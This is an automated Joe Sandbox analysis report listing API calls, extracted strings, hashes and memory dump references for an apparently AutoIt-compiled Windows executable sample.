                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                            • Instruction ID: 73e029442c172ec833e3237daaa3a99f019494d539b9711260ba586e6fa6bb74
                                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                            • Instruction Fuzzy Hash: 57C173322091B35ADF2D463A943453EBAA1BFA27B131B076DD4B3DB1D4EE10C9A5D720
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction ID: 35bd88bce62c4b1c9f16d98c6b408087df70ab4c1f32d6e858b07ec27f47e969
                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction Fuzzy Hash: 34C184362451B349DF2D4639A47813EBAA1EEB27B132B076DD4B3CB1D4EE20C9A5D710
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 0087785B
                                                                            • DeleteObject.GDI32(00000000), ref: 0087786D
                                                                            • DestroyWindow.USER32 ref: 0087787B
                                                                            • GetDesktopWindow.USER32 ref: 00877895
                                                                            • GetWindowRect.USER32(00000000), ref: 0087789C
                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008779DD
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008779ED
                                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877A35
                                                                            • GetClientRect.USER32(00000000,?), ref: 00877A41
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00877A7B
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877A9D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877AB0
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877ABB
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00877AC4
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877AD3
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00877ADC
                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877AE3
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00877AEE
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877B00
                                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00892CAC,00000000), ref: 00877B16
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00877B26
                                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00877B4C
                                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00877B6B
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877B8D
                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877D7A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2211948467-2373415609
                                                                            • Opcode ID: c6216a575e1039007140d7829e1c8260ec2476315e499cf79509be90d651b6c5
                                                                            • Instruction ID: fe812de1bd21e56385c8ff6f504be847134bb8fc5f4aae791159a64445f9ea3b
                                                                            • Opcode Fuzzy Hash: c6216a575e1039007140d7829e1c8260ec2476315e499cf79509be90d651b6c5
                                                                            • Instruction Fuzzy Hash: 1E023B71900115AFDB14DFA8DC89EAE7BB9FB48310F148169F919EB2A2D734ED41CB60
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,0088F910), ref: 00883627
                                                                            • IsWindowVisible.USER32(?), ref: 0088364B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 4105515805-45149045
                                                                            • Opcode ID: edfbd58687663c8a78afb733c6ee2aaf48af903d3155277b9f38c42558fc4538
                                                                            • Instruction ID: 0b7f21cbc3ec835fd49521b7c480c926fdfad3b94b779cf6f21cf53914eee285
                                                                            • Opcode Fuzzy Hash: edfbd58687663c8a78afb733c6ee2aaf48af903d3155277b9f38c42558fc4538
                                                                            • Instruction Fuzzy Hash: 47D15D702043119BCA04FF18C852A6E7BA5FF95754F544468F986DB3A3DB21EE4ACB42
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0088A630
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0088A661
                                                                            • GetSysColor.USER32(0000000F), ref: 0088A66D
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 0088A687
                                                                            • SelectObject.GDI32(?,00000000), ref: 0088A696
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0088A6C1
                                                                            • GetSysColor.USER32(00000010), ref: 0088A6C9
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 0088A6D0
                                                                            • FrameRect.USER32(?,?,00000000), ref: 0088A6DF
                                                                            • DeleteObject.GDI32(00000000), ref: 0088A6E6
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0088A731
                                                                            • FillRect.USER32(?,?,00000000), ref: 0088A763
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0088A78E
                                                                              • Part of subcall function 0088A8CA: GetSysColor.USER32(00000012), ref: 0088A903
                                                                              • Part of subcall function 0088A8CA: SetTextColor.GDI32(?,?), ref: 0088A907
                                                                              • Part of subcall function 0088A8CA: GetSysColorBrush.USER32(0000000F), ref: 0088A91D
                                                                              • Part of subcall function 0088A8CA: GetSysColor.USER32(0000000F), ref: 0088A928
                                                                              • Part of subcall function 0088A8CA: GetSysColor.USER32(00000011), ref: 0088A945
                                                                              • Part of subcall function 0088A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088A953
                                                                              • Part of subcall function 0088A8CA: SelectObject.GDI32(?,00000000), ref: 0088A964
                                                                              • Part of subcall function 0088A8CA: SetBkColor.GDI32(?,00000000), ref: 0088A96D
                                                                              • Part of subcall function 0088A8CA: SelectObject.GDI32(?,?), ref: 0088A97A
                                                                              • Part of subcall function 0088A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0088A999
                                                                              • Part of subcall function 0088A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088A9B0
                                                                              • Part of subcall function 0088A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0088A9C5
                                                                              • Part of subcall function 0088A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088A9ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 3521893082-0
                                                                            • Opcode ID: aa2a1b382e73d55986ae0fe7ab473d94bff3aaefbd94ef114dad774e4b29e129
                                                                            • Instruction ID: c1ee18d28b8a6b71f65fa963b9e5bcc2af3eb41904181bede64871c43b00d52f
                                                                            • Opcode Fuzzy Hash: aa2a1b382e73d55986ae0fe7ab473d94bff3aaefbd94ef114dad774e4b29e129
                                                                            • Instruction Fuzzy Hash: A7918E72008301EFD711AF68DC08A5B7BA9FF89321F104B2AF6A2D61E2D771D944CB52
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?), ref: 00802CA2
                                                                            • DeleteObject.GDI32(00000000), ref: 00802CE8
                                                                            • DeleteObject.GDI32(00000000), ref: 00802CF3
                                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00802CFE
                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00802D09
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0083C43B
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0083C474
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0083C89D
                                                                              • Part of subcall function 00801B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00802036,?,00000000,?,?,?,?,008016CB,00000000,?), ref: 00801B9A
                                                                            • SendMessageW.USER32(?,00001053), ref: 0083C8DA
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0083C8F1
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0083C907
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0083C912
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 464785882-4108050209
                                                                            • Opcode ID: d3e310ac16b27b5f4b193897f3b755f9c8145708d31557e67cae585bcba65d70
                                                                            • Instruction ID: 1ded665338ae546c850bc5b2df695159689712401515871b130840a348adb36d
                                                                            • Opcode Fuzzy Hash: d3e310ac16b27b5f4b193897f3b755f9c8145708d31557e67cae585bcba65d70
                                                                            • Instruction Fuzzy Hash: 8C128D30600201EFEB65DF28C888BA9BBE5FF85314F544569F995EB2A2C771EC41CB91
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 008774DE
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0087759D
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008775DB
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008775ED
                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00877633
                                                                            • GetClientRect.USER32(00000000,?), ref: 0087763F
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00877683
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00877692
                                                                            • GetStockObject.GDI32(00000011), ref: 008776A2
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 008776A6
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008776B6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008776BF
                                                                            • DeleteDC.GDI32(00000000), ref: 008776C8
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008776F4
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 0087770B
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00877746
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0087775A
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 0087776B
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0087779B
                                                                            • GetStockObject.GDI32(00000011), ref: 008777A6
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008777B1
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008777BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 08f3de814ca7759a8be00d2ce9c678a5312137157488b51599775048d9008419
                                                                            • Instruction ID: 1b79e9e970e6cc94fceeaa5e585a4d6460b6d533b12ed1752aee751f0882213c
                                                                            • Opcode Fuzzy Hash: 08f3de814ca7759a8be00d2ce9c678a5312137157488b51599775048d9008419
                                                                            • Instruction Fuzzy Hash: 38A12DB1A40615BFEB14DBA8DC4AFAA7BB9FB08710F108114FA15E72E1D774AD40CB64
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0086AD1E
                                                                            • GetDriveTypeW.KERNEL32(?,0088FAC0,?,\\.\,0088F910), ref: 0086ADFB
                                                                            • SetErrorMode.KERNEL32(00000000,0088FAC0,?,\\.\,0088F910), ref: 0086AF59
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: c34bcd0186e9975f30275cdbe855b15c64c16fa7d039c854c9af926fac5eee1c
                                                                            • Instruction ID: e12d67b6730968604b07f91ab927668be16ed016a2ca2935f0feff3142ee1bf6
                                                                            • Opcode Fuzzy Hash: c34bcd0186e9975f30275cdbe855b15c64c16fa7d039c854c9af926fac5eee1c
                                                                            • Instruction Fuzzy Hash: 78517BB0648209EACB08EB64D993CBDB7A8FF08714B228066E416F7391DE359D01DF53
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00889AD2
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00889B8B
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00889BA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: S$0
                                                                            • API String ID: 2326795674-770256432
                                                                            • Opcode ID: 2b8a5154e4cdc4062013824ba9241b4cfe15d6d940d991c718f499f9b9babe51
                                                                            • Instruction ID: 68c1e9fbe155008b80dccfb0a92e753c3403312334f38d6bef118953b642449d
                                                                            • Opcode Fuzzy Hash: 2b8a5154e4cdc4062013824ba9241b4cfe15d6d940d991c718f499f9b9babe51
                                                                            • Instruction Fuzzy Hash: 5302BF30104201AFE729EF18C849BBABBE5FF49314F08462DFAD9D62A1D775D944CB52
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-86951937
                                                                            • Opcode ID: 2b166298d1f8c7cde4f35c2452aa160c9325e31b01ae55599d99e11d809a9fd8
                                                                            • Instruction ID: a9f3f7470e10c0b110cd8f97c0571ae89c535ff20eaf2dc565222809edc5a015
                                                                            • Opcode Fuzzy Hash: 2b166298d1f8c7cde4f35c2452aa160c9325e31b01ae55599d99e11d809a9fd8
                                                                            • Instruction Fuzzy Hash: 228104B0700219AEDF60BA64EC52FAB3768FF15710F040024FD05EA2D6FB64DA65C6A2
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00888AC1
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00888AD2
                                                                            • CharNextW.USER32(0000014E), ref: 00888B01
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00888B42
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00888B58
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00888B69
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00888B86
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00888BD8
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00888BEE
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00888C1F
                                                                            • _memset.LIBCMT ref: 00888C44
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00888C8D
                                                                            • _memset.LIBCMT ref: 00888CEC
                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00888D16
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00888D6E
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00888E1B
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00888E3D
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00888E87
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00888EB4
                                                                            • DrawMenuBar.USER32(?), ref: 00888EC3
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00888EEB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: S$0
                                                                            • API String ID: 1073566785-770256432
                                                                            • Opcode ID: ed56dbbc89f20a1b00f0370c4b8ca810e8ff6b3f7cced8438666d3789d8c9eac
                                                                            • Instruction ID: 92de10854ed4734378ecca118249076f64553348cbcd70c3b31be8cfdd00b29d
                                                                            • Opcode Fuzzy Hash: ed56dbbc89f20a1b00f0370c4b8ca810e8ff6b3f7cced8438666d3789d8c9eac
                                                                            • Instruction Fuzzy Hash: 47E14C74900218EADB20EF54CC84EEE7BB9FF05720F50815AFA15EA291DB749980DF61
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 0088A903
                                                                            • SetTextColor.GDI32(?,?), ref: 0088A907
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0088A91D
                                                                            • GetSysColor.USER32(0000000F), ref: 0088A928
                                                                            • CreateSolidBrush.GDI32(?), ref: 0088A92D
                                                                            • GetSysColor.USER32(00000011), ref: 0088A945
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088A953
                                                                            • SelectObject.GDI32(?,00000000), ref: 0088A964
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0088A96D
                                                                            • SelectObject.GDI32(?,?), ref: 0088A97A
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0088A999
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088A9B0
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0088A9C5
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088A9ED
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0088AA14
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0088AA32
                                                                            • DrawFocusRect.USER32(?,?), ref: 0088AA3D
                                                                            • GetSysColor.USER32(00000011), ref: 0088AA4B
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0088AA53
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0088AA67
                                                                            • SelectObject.GDI32(?,0088A5FA), ref: 0088AA7E
                                                                            • DeleteObject.GDI32(?), ref: 0088AA89
                                                                            • SelectObject.GDI32(?,?), ref: 0088AA8F
                                                                            • DeleteObject.GDI32(?), ref: 0088AA94
                                                                            • SetTextColor.GDI32(?,?), ref: 0088AA9A
                                                                            • SetBkColor.GDI32(?,?), ref: 0088AAA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
